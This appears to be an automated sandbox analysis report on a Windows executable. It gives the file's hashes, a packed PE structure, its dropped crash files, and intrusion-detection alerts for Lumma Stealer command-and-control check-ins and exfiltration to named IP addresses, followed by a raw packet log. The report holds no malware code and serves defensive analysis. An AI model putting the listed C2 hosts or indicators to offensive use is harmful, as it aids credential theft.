                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.4.0.<./.P.i.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4624
                                                                                                                                                          Entropy (8bit):4.5169247168383295
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:cvIwWl8zsndJg77aI952WpW8VYWYm8M4JdKGFf+q8P6OM0zTYBdd:uIjfn3I7jX7VCJlS9zTYBdd
                                                                                                                                                          MD5:17EF6497E55898EC73E3112689C3CA0F
                                                                                                                                                          SHA1:531086663DA854841122202123CF5CE7D82FFCE1
                                                                                                                                                          SHA-256:ADEB8338573EDB76FB140D61EFE9DBA69D440FCDB9A10030C2D4917644F65B7B
                                                                                                                                                          SHA-512:594C64654D4879139968E650273EC9AE6C80B37484FAF07D993CBFF997C0135AB5FE71002F038E07D06FFFF9E8AF17FC644EF77BE9FEF6E6FE5A8278B5129E1C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643639" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                          Entropy (8bit):4.468635228582377
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:YzZfpi6ceLPx9skLmb0f/ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNgjDH5S:OZHt/ZWOKnMM6bFpuj4
                                                                                                                                                          MD5:E194CA80919150EA2CBDB4492777EABA
                                                                                                                                                          SHA1:09CE615BF178B82DF37F531197BAE3C94F278A59
                                                                                                                                                          SHA-256:B8293A14ADE35D50ED5DADF2DBB1B8F6641EFD025A376EAC8BA6C51BD0BF7100
                                                                                                                                                          SHA-512:EF8E4BF780554603ABFD60FAE9FE2A93B860745C0B09C2CE791355587D2F79960A63B28A9FFBE0FD4EBC250C2EDF3A8FD2D1D66ED14BB91ACFDF166EFB1098CD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Entropy (8bit):6.5349533641355295
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:BJQizQ6sqT.exe
                                                                                                                                                          File size:2'916'352 bytes
                                                                                                                                                          MD5:daed40d82d8d43f2ad0be3fb944c99a3
                                                                                                                                                          SHA1:00a4b14b4e574ac6e5c1136b0ee9789c3cf26b61
                                                                                                                                                          SHA256:ac43fe948b1c2c1039fb007c8ca7da8575b1ffa60b5bcd4de626fc9dc7aa55fa
                                                                                                                                                          SHA512:43acec0e1c5679edaa0851e1f057d08af9d9add671e682137f1ac513c74bc743cd4541aec59107320e865b0d9071154b46deb4fd11c4a3df607e72bb4bc69651
                                                                                                                                                          SSDEEP:49152:eLgrqaZ9jM9dzE7uSwm6fTB6m+Tg2IB+f7iZsyhbsaz6Jkl:gGqaZ9olE7uLm6fd84If7iOibsa+JA
                                                                                                                                                          TLSH:22D538E1E906B1CFD48E56B4906BCD526D6D06B94B2088C7AC6C767EBE63DC011BFC24
                                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................P/...........@.........................../.....,.,...@.................................T0..h..
                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                          Entrypoint:0x6f5000
                                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:6
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:6
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                          Instruction
                                                                                                                                                          jmp 00007FC0406E5BCAh
                                                                                                                                                          divps xmm5, dqword ptr [eax+eax]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          jmp 00007FC0406E7BC5h
                                                                                                                                                          add byte ptr [edi], bh
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [edx], ah
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [edx+ecx], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          push es
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [ebx], cl
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [0000000Ah], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [ecx], cl
                                                                                                                                                          add byte ptr [eax], 00000000h
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add eax, 0000000Ah
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], dl
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [ebx], cl
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x51000 | 0x24800 | 084c04bdb9c53ebf68f21f3db4e15135 | False | 0.9973980629280822 | data | 7.976841630322983 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x52000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| qxtptbyt | 0x54000 | 0x2a0000 | 0x2a0000 | 5e272f4f504e5b77d6cd6ebaa80a3d9e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| fodmgcsz | 0x2f4000 | 0x1000 | 0x400 | d62cc8a309ff1276fc7ff0c89ce13a7b | False | 0.798828125 | data | 6.278127864237946 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x2f5000 | 0x3000 | 0x2200 | 56ca593a4a651ef048c6f5872b167f8d | False | 0.0661764705882353 | DOS executable (COM) | 0.7971112201755248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-23T09:16:41.578258+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49721 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:42.339574+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49721 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:42.339574+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49721 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:43.576322+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49722 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:44.341927+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49722 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:44.341927+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49722 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:46.568277+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49727 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:47.622739+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49727 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:49.148799+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49728 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:51.897153+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49739 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:54.597336+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49746 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:16:57.153372+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49752 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:17:02.105430+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49763 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:17:02.919814+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49763 | 172.67.150.173 | 443 | TCP |
| 2024-12-23T09:17:04.644220+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49769 | 185.166.143.48 | 443 | TCP |
| 2024-12-23T09:17:07.061631+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49776 | 3.5.29.90 | 443 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                          Dec 23, 2024 09:16:47.622749090 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:47.622863054 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:47.622967958 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.623608112 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.623629093 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:47.936441898 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.936492920 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:47.938028097 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.938412905 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.938426018 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.148721933 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.148798943 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.150476933 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.150487900 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.150722980 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.151947975 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.152081013 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.152115107 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.152174950 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.152189016 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.427051067 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.427166939 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.427223921 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.427354097 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.427371979 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.685180902 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.685236931 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.685326099 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.685693026 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.685703039 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.897068977 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.897152901 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.899123907 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.899138927 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.899398088 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.901766062 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.901904106 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.901925087 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.901973963 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.901983023 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:52.842695951 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:52.842783928 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:52.842827082 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:52.843059063 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:52.843075991 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:53.380677938 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:53.380716085 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:53.384471893 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:53.384833097 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:53.384843111 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:54.597245932 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:54.597336054 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:54.601788998 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:54.601809978 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:54.602052927 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:54.608603954 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:54.612842083 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:54.612854958 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.379576921 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.379729986 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.379781008 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.380068064 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.380081892 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.938924074 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.938975096 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.939141989 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.939517021 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.939532042 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.153299093 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.153372049 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.154973030 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.154983044 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.155222893 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.156761885 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.157727003 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.157759905 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.157864094 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.157893896 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158102989 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158138990 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158284903 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158313990 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158499002 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158530951 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158668041 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158691883 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158699989 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158715963 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158859968 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158885956 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158906937 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.159472942 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.159503937 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199336052 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.199546099 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199583054 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.199604034 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199621916 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.199644089 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199657917 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.199671030 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199677944 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.812747955 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.812861919 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.812930107 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.813201904 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.813221931 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.891539097 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.891581059 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.891658068 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.892209053 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.892225027 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.105350971 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.105429888 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.106894016 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.106904030 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.107161045 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.108623028 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.108664989 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.108705044 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.919791937 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.919888020 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.920015097 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.920320988 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.920351028 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.920424938 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:08.371073008 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.371109009 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.371131897 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.371135950 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.371148109 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.371170998 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.371198893 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.380172014 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.380188942 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.380217075 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.380249977 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.380260944 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.380287886 CET49776443192.168.2.63.5.29.90
